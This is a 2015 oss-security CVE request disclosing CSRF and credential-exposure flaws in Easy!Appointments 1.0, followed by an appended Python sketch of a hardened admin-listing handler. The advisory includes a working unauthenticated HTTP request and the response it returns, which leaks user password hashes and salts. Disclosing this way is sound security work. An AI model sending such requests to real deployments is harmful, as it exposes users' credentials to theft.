Message-ID: <20150727131421.GA20274@lakka.kapsi.fi>
Date: Mon, 27 Jul 2015 16:14:21 +0300
From: Henri Salo <henri@...v.fi>
To: oss-security@...ts.openwall.com
Cc: cve-assign@...re.org, Alex Tselegidis <alextselegidis@...il.com>
Subject: CVE request: Easy!Appointments 1.0 Cross-Site Request Forgery and Insufficiently Protected Credentials vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Product: Easy!Appointments Open Source Appointment Scheduler
Product URL: http://easyappointments.org/
Vendor: Alex Tselegidis
Vulnerability Type: Cross-Site Request Forgery (CWE-352)
                    Insufficiently Protected Credentials (CWE-522)
Vulnerable Versions: 1.0
Fixed Version: next release
Vendor Notification: 2015-04-03
Solution Status: Fixed by vendor
Solution Date: 2015-05-28
Public Disclosure: 2015-07-27

Vulnerability Details:

The web application does not sufficiently verify whether a well-formed, valid,
consistent request was intentionally provided by the user who submitted the
request. The application transmits all user credentials to an unauthenticated
user and possibly allows other unauthorized actions.

Proof-of-concept without authentication:

"""
POST /ea/backend_api/ajax_filter_admins HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://example.com/ea/backend/users
Content-Length: 4
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

key=
"""

Returns:

"""
HTTP/1.1 200 OK
Date: Thu, 09 Apr 2015 10:28:38 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.4.39-0+deb7u2
Set-Cookie: ci_session=*removed*; expires=Thu, 09-Apr-2015 12:28:38 GMT; path=/
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 539

[{"id":"84","first_name":"Henri","last_name":"Salo","email":"email@...mple.com","mobile_number":null,"phone_number":"04012345678","address":null,"city":null,"state":null,"zip_code":null,"notes":null,"id_roles":"1","settings":{"username":"henri","password":"1f40f9a5d17bedf197274fcc1886ef6ef4015b0f883513782d6fa437f8ab9af7","salt":"547ca602bda6a2a97ff4222fb71d61c75436da1ebf86a41c33219d11f1f4568e","working_plan":null,"notifications":"0","google_sync":"0","google_token":null,"google_calendar":null,"sync_past_days":"5","sync_future_days":"5"}}]
"""

Fixed in the following commit:
https://github.com/alextselegidis/easyappointments/commit/1f73e7fcbc2c06505178200567ac905ae8570326

Related commits to add CSRF protection:
https://github.com/alextselegidis/easyappointments/commit/f223ffa343ad91d046b4469248f6479edf1718d7
https://github.com/alextselegidis/easyappointments/commit/daf4865c290c58b66f73507a0ae1ec41987ad840
https://github.com/alextselegidis/easyappointments/commit/d88c138d2dd35820e355f0d7f3b93db3cc5473e8
https://github.com/alextselegidis/easyappointments/commit/ad8c9b6522c560ac5b6309f62f8b3e2319483d54
https://github.com/alextselegidis/easyappointments/commit/ecbe5600df03ac970e4e743215d3b3be6e1e6860

References:
https://scapsync.com/cwe/CWE-352
https://scapsync.com/cwe/CWE-522
https://cwe.mitre.org/data/definitions/352.html
https://cwe.mitre.org/data/definitions/522.html
https://en.wikipedia.org/wiki/Cross-site_request_forgery
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet

- -- 
Henri Salo
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBAgAGBQJVti6tAAoJECet96ROqnV0mlwP/R82KPUH15elyTfqeImCsc/6
FpUiZrvQPvW2saPlweec6vLsdr361dZb3wfSLpltyDK/b/XFhRxGOqufjETDfsrr
tP5y7OqvpzKisu+itOpsFBiFppuLD3UCK2GsWyFM0JHrcSkOyG5dKQ1LGkQzZObD
vG2U6ofB7PRoW0C9iorlUVa7InUt9sEWojwjsONtacbibiLD4jIqui1YUs0Dg9yj
QUTBKd8RcSUddkZYzhKIkhBYgdaMdSO1ObE1taLZlK2lfQCI9L5pAXAf4k8YRP5X
N+wiX6LfmVcb+8Os0iJpsFZLT9oe0B3Kl1elm51MWFyA00P5M7B8x3svkeH34LUH
OBDyE92+LH352zn9nDIpZFeEwoEZTEZak5zAKM0L1i+qXU9LRwwZXahFvY4VyZng
mvqf4tZEogJV55q27HaWr1595b7MEHBexiNQmFrC5k9l2fFzVZRnlaIHLYjGvwpf
vSFHG8u/YpSmOOM3FM/yRZlgR21jM2cdYIDs5vpQkGfjdSW61CdQwp6m/j1znkqH
jjxYiqIhp9me4xEWmAhgm26HkQcpCHlEBwA2N2x9RvnS/Lw6oPHln8dxhu4OP3mr
Eq43X2Zz8kQJkZuQnufAzmtMYxvKmzhfVYWREBzhohox+nXImqlAvYxzCQzBEGBE
++lf9BJDbx+CMendxx9Z
=cYYp
-----END PGP SIGNATURE-----
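The report describes three separate gaps in one AJAX endpoint: the request is served without any session check, nothing ties the request to a user-initiated action (no CSRF token), and the full user record, password hash and salt included, is serialised straight into the JSON reply. The following is an added illustration in Python of a handler that closes all three; it is not Easy!Appointments or the vendor's fix, and the `Request` class, the `SESSIONS` store, the `ADMIN_RECORDS` sample and the `handle_filter_admins` function are assumptions constructed for this example only.

```python
"""Hardened sketch of an admin-listing AJAX handler (added example, not project code)."""
import hmac
import json
from dataclasses import dataclass, field

# Keys that must never be serialised into an API response, however deep they sit.
CREDENTIAL_FIELDS = frozenset({"password", "salt", "google_token"})


@dataclass
class Request:
    """Minimal stand-in for a framework request object (assumption for the example)."""
    method: str
    path: str
    form: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)


# Constructed in-memory session store: cookie value -> session data.
SESSIONS = {
    "sess-admin": {"user_id": 1, "role": "admin", "csrf_token": "tok-admin-123"},
    "sess-provider": {"user_id": 2, "role": "provider", "csrf_token": "tok-prov-456"},
}

# Constructed sample of what the database layer would hand back for the admin query.
ADMIN_RECORDS = [
    {
        "id": "1", "first_name": "Alice", "last_name": "Example",
        "email": "alice@example.invalid", "id_roles": "1",
        "settings": {
            "username": "alice",
            "password": "<constructed-hash>",   # must not reach the client
            "salt": "<constructed-salt>",       # must not reach the client
            "notifications": "0",
        },
    },
]


def scrub(value):
    """Recursively drop credential material before the record is serialised."""
    if isinstance(value, dict):
        return {k: scrub(v) for k, v in value.items() if k not in CREDENTIAL_FIELDS}
    if isinstance(value, list):
        return [scrub(v) for v in value]
    return value


def handle_filter_admins(req: Request):
    """Return (status, body) for the filter-admins action."""
    # 1. Authentication: the session cookie must map to a live session.
    session = SESSIONS.get(req.cookies.get("ci_session", ""))
    if session is None:
        return 401, {"error": "authentication required"}
    # 2. Authorisation: listing admins is an admin-only action.
    if session["role"] != "admin":
        return 403, {"error": "insufficient privileges"}
    # 3. CSRF: the submitted token must match the one bound to this session.
    #    compare_digest keeps the comparison constant-time.
    supplied = req.form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, session["csrf_token"]):
        return 403, {"error": "invalid CSRF token"}
    # 4. Do the actual work, then strip credentials before returning.
    key = req.form.get("key", "").lower()
    rows = [
        r for r in ADMIN_RECORDS
        if key in (r["first_name"] + r["last_name"] + r["email"]).lower()
    ]
    return 200, scrub(rows)


if __name__ == "__main__":
    good = Request("POST", "/backend_api/ajax_filter_admins",
                   form={"key": "", "csrf_token": "tok-admin-123"},
                   cookies={"ci_session": "sess-admin"})
    status, body = handle_filter_admins(good)
    print(status, json.dumps(body))
```

Each check is ordered so the cheapest and most general rejection comes first: an anonymous request never reaches the role check, and a wrong role never reaches the CSRF comparison. The `scrub` step is deliberately applied to the serialised output rather than to the query, so a later change to the database layer cannot reintroduce the leak by returning more columns.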